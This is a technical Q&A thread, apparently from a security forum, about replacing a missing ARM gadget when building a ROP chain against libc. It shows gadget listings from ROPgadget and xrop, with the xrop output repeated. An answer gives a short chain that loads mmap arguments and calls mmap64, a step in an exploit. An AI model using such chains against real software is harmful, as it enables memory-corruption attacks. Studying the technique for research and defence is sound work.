ROP Programming/Exploitation on ARM - Gadget chain

Question

Unfortunately, I cannot find this gadget in my libc.so. How can we reprogram this using different instructions:

pop {r0, r1, r2, r3, pc}

Which instructions will achieve the same? What gadgets I have to look for?

It relates to this exploit

# pivot swaps stack then returns to pop {pc}
  page += p32(pop_r0_r1_r2_r3_pc)

Thanks,

Update:

These gadgets are available in my libc.so:

Which tool is better ROPgadget or xrop? xrop showed definitely more gadgets

ROPgadget --binary libc.so --ropchain --only "pop"
Gadgets information
============================================================
0x0001061c : pop {r0, pc}
0x00042664 : pop {r1, pc}
0x00042d00 : pop {r3, pc}
0x0000f7dc : pop {r4, pc}
0x00041658 : pop {r4, r5, pc}
0x0004198c : pop {r4, r5, r6, pc}
0x00042c2c : pop {r4, r5, r6, r7, pc}

And using xrop:

Usage: xrop [-r arch] [-b bits] [-e bytes] [-l endian] [-a relocaddr] [-s regex] [-v] [-h] inputfile
     -b (16 | 32 | 64) sets the processor mode
     -r (arm | mips | powerpc | x86) raw binary file of given architecture
     -v displays the version number
     -l (b | e) big or little endian
     -e skips <bytes> of header
     -a rellocate at given address
     -n disable colors in the output
     -s filter gadgets with <regex>
     -h prints this menu

$ ./xrop -r arm -b 32 -l b  -s pop libc.so
> 0x19474               rsbmi   r4, r8, r8, ror #18
0x19478                 andsmi  r5, sl, #134217729  ; 0x8000001
0x1947c                 mvnpl   r0, #0, 4
0x19480                 popeq   {r3, r4, r5, r6, r7, ip, sp, pc}
_______________________________________________________________

> 0x230cc               mvnseq  r0, #-1073741814    ; 0xc000000a
0x230d0                 ldrdeq  pc, [sl], -r1   
0x230d4                 ldreq   r2, [r1, #2400]!    ; 0x960
0x230d8                 popcc   {r3, r4, r5, r6, r7, ip, lr}
_______________________________________________________________

> 0x2f1f0               rsbmi   r0, r1, #1073741848 ; 0x40000018
0x2f1f4                 popeq   {r0, r1, r2, r3, r4, r5, r7}
0x2f1f8                 teqeq   r3, r7, ror #10
0x2f1fc                 mrc2    10, 6, fp, cr12, cr8, {4}
_______________________________________________________________

> 0x3e520               ldrdls  r0, [r2, #-8]
0x3e524                 popcc   {r3, r6, r8, sl}
0x3e528                 eoreq   r7, r1, r4, asr #16
0x3e52c                 ldrbtle fp, [r7], #2296 ; 0x8f8
_______________________________________________________________

> 0x3e664               ldrdls  r0, [r2, #-8]
0x3e668                 popcc   {r3, r6, r8, sl}
0x3e66c                 eoreq   r7, r1, r4, asr #16
0x3e670                 ldrbtle r1, [r7], #1784 ; 0x6f8
_______________________________________________________________

> 0x40244               svcmi   0x00f0ff30
0x40248                 popeq   {r0, r2, r4, r5, r7, fp}
0x4024c                 ldrhteq r3, [r1], r9
_______________________________________________________________

> 1 + 0x1a84            movs    r2, r2
1 + 0x1a86              movs    r0, r1
1 + 0x1a88              asrs    r7, r7, #15
1 + 0x1a8a              movs    r0, r0
1 + 0x1a8c              pop {r0, r1, r2, r6, pc}
_______________________________________________________________

> 1 + 0xfb60            subs    r7, #192    ; 0xc0
1 + 0xfb62              adds    r0, #1
1 + 0xfb64              pop {r4, r5, r6, r7}
1 + 0xfb66              subs    r0, #1
1 + 0xfb68              strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0xfb5e            tst.w   r5, #98304  ; 0x18000
1 + 0xfb62              adds    r0, #1
1 + 0xfb64              pop {r4, r5, r6, r7}
1 + 0xfb66              subs    r0, #1
1 + 0xfb68              strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0x119e6           pop {r0, r1, r2, r3, r4, r5}
1 + 0x119e8             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x11a46           pop {r0, r2, r4, r5, r7}
1 + 0x11a48             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x11c2e           pop {r2, r3, r4, r6, r7}
1 + 0x11c30             lsrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x12db0           pop {r0, r1, r3, r4, r5}
1 + 0x12db2             movs    r0, #0
1 + 0x12db4             strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0x21c72           subs    r0, r0, r4
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x21c6e           cmp r3, #17
1 + 0x21c70             vmul.f64    d1, d1, d0
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x21c6c           vmov    d1, r2, r3
1 + 0x21c70             vmul.f64    d1, d1, d0
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2db40           pop {r0, r3, r4, r5}
1 + 0x2db42             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2dc90           lsrs    r4, r2, #12
1 + 0x2dc92             vpop    {d8-d9}
1 + 0x2dc96             vadd.f64    d5, d3, d4
1 + 0x2dc9a             vmovlt  r0, r1, d5
1 + 0x2dc9e             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2dc8e           vmov    d4, r0, r1
1 + 0x2dc92             vpop    {d8-d9}
1 + 0x2dc96             vadd.f64    d5, d3, d4
1 + 0x2dc9a             vmovlt  r0, r1, d5
1 + 0x2dc9e             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x4ea9a           cbnz    r0, 0x4eacc
1 + 0x4ea9c             cbnz    r2, 0x4eb0e
1 + 0x4ea9e             pop {r0, r2, r3, r4, r5, r7}
_______________________________________________________________

> 1 + 0x5954c           movs    r0, r0
1 + 0x5954e             movs    r0, r1
1 + 0x59550             movs    r1, r3
1 + 0x59552             movs    r0, r0
1 + 0x59554             pop {r0, r1, r2, r6}
_______________________________________________________________

> 1 + 0x6b1cc           movs    r2, r2
1 + 0x6b1ce             movs    r0, r1
1 + 0x6b1d0             ldrsh   r3, [r7, r4]
1 + 0x6b1d2             movs    r0, r0
1 + 0x6b1d4             pop {r0, r1, r2, r6, pc}
_______________________________________________________________

$ ./xrop -r arm -b 64 -l b  -s pop libc.so
> 0x19474               rsbmi   r4, r8, r8, ror #18
0x19478                 andsmi  r5, sl, #134217729  ; 0x8000001
0x1947c                 mvnpl   r0, #0, 4
0x19480                 popeq   {r3, r4, r5, r6, r7, ip, sp, pc}
_______________________________________________________________

> 0x230cc               mvnseq  r0, #-1073741814    ; 0xc000000a
0x230d0                 ldrdeq  pc, [sl], -r1   
0x230d4                 ldreq   r2, [r1, #2400]!    ; 0x960
0x230d8                 popcc   {r3, r4, r5, r6, r7, ip, lr}
_______________________________________________________________

> 0x2f1f0               rsbmi   r0, r1, #1073741848 ; 0x40000018
0x2f1f4                 popeq   {r0, r1, r2, r3, r4, r5, r7}
0x2f1f8                 teqeq   r3, r7, ror #10
0x2f1fc                 mrc2    10, 6, fp, cr12, cr8, {4}
_______________________________________________________________

> 0x3e520               ldrdls  r0, [r2, #-8]
0x3e524                 popcc   {r3, r6, r8, sl}
0x3e528                 eoreq   r7, r1, r4, asr #16
0x3e52c                 ldrbtle fp, [r7], #2296 ; 0x8f8
_______________________________________________________________

> 0x3e664               ldrdls  r0, [r2, #-8]
0x3e668                 popcc   {r3, r6, r8, sl}
0x3e66c                 eoreq   r7, r1, r4, asr #16
0x3e670                 ldrbtle r1, [r7], #1784 ; 0x6f8
_______________________________________________________________

> 0x40244               svcmi   0x00f0ff30
0x40248                 popeq   {r0, r2, r4, r5, r7, fp}
0x4024c                 ldrhteq r3, [r1], r9
_______________________________________________________________

> 1 + 0x1a84            movs    r2, r2
1 + 0x1a86              movs    r0, r1
1 + 0x1a88              asrs    r7, r7, #15
1 + 0x1a8a              movs    r0, r0
1 + 0x1a8c              pop {r0, r1, r2, r6, pc}
_______________________________________________________________

> 1 + 0xfb60            subs    r7, #192    ; 0xc0
1 + 0xfb62              adds    r0, #1
1 + 0xfb64              pop {r4, r5, r6, r7}
1 + 0xfb66              subs    r0, #1
1 + 0xfb68              strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0xfb5e            tst.w   r5, #98304  ; 0x18000
1 + 0xfb62              adds    r0, #1
1 + 0xfb64              pop {r4, r5, r6, r7}
1 + 0xfb66              subs    r0, #1
1 + 0xfb68              strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0x119e6           pop {r0, r1, r2, r3, r4, r5}
1 + 0x119e8             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x11a46           pop {r0, r2, r4, r5, r7}
1 + 0x11a48             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x11c2e           pop {r2, r3, r4, r6, r7}
1 + 0x11c30             lsrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x12db0           pop {r0, r1, r3, r4, r5}
1 + 0x12db2             movs    r0, #0
1 + 0x12db4             strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0x21c72           subs    r0, r0, r4
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x21c6e           cmp r3, #17
1 + 0x21c70             vmul.f64    d1, d1, d0
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x21c6c           vmov    d1, r2, r3
1 + 0x21c70             vmul.f64    d1, d1, d0
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2db40           pop {r0, r3, r4, r5}
1 + 0x2db42             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2dc90           lsrs    r4, r2, #12
1 + 0x2dc92             vpop    {d8-d9}
1 + 0x2dc96             vadd.f64    d5, d3, d4
1 + 0x2dc9a             vmovlt  r0, r1, d5
1 + 0x2dc9e             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2dc8e           vmov    d4, r0, r1
1 + 0x2dc92             vpop    {d8-d9}
1 + 0x2dc96             vadd.f64    d5, d3, d4
1 + 0x2dc9a             vmovlt  r0, r1, d5
1 + 0x2dc9e             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x4ea9a           cbnz    r0, 0x4eacc
1 + 0x4ea9c             cbnz    r2, 0x4eb0e
1 + 0x4ea9e             pop {r0, r2, r3, r4, r5, r7}
_______________________________________________________________

> 1 + 0x5954c           movs    r0, r0
1 + 0x5954e             movs    r0, r1
1 + 0x59550             movs    r1, r3
1 + 0x59552             movs    r0, r0
1 + 0x59554             pop {r0, r1, r2, r6}
_______________________________________________________________

> 1 + 0x6b1cc           movs    r2, r2
1 + 0x6b1ce             movs    r0, r1
1 + 0x6b1d0             ldrsh   r3, [r7, r4]
1 + 0x6b1d2             movs    r0, r0
1 + 0x6b1d4             pop {r0, r1, r2, r6, pc}
_______________________________________________________________

Answer 1

I didn't glance long, but using the 1 + 0x59554 : pop {r0, r1, r2, r6} result from xrop, and the 0x00042d00 : pop {r3, pc} result from ROPgadget, have you tried fitting this in your ROP stack?

page += p32(pop_r0_r1_r2_r6_pc) #xrop result with loaded offset
page += p32(r0_popval)  #r0 - mmap() address in exploit.
page += p32(r1_popval)  #r1 - size in exploit.
page += p32(r2_popval)  #r2 - protection in exploit.
page += p32(r6_popval)  #r6 - 0x66666666 looks just like recognizable junk.
page += p32(pop_r3_pc)  #ROPgadget result with loaded offset
page += p32(r3_popval)  #r3 - flags for mmap in exploit.
page += p32(mmap64_address)     #for popping into pc to call mmap64(). 

I'd figure that'd do fine if they're valid gadgets. Consider also looking for Thumb gadgets if you've decent gadgets for branching and exchanging between modes.

I've been learning similar material, for which ROPgadget has been alright, but I'd suggest using whichever one has more ready features for getting what you need done faster. I'd love for example automated ARM ropchain generation in ROPgadget, but it's not a feature.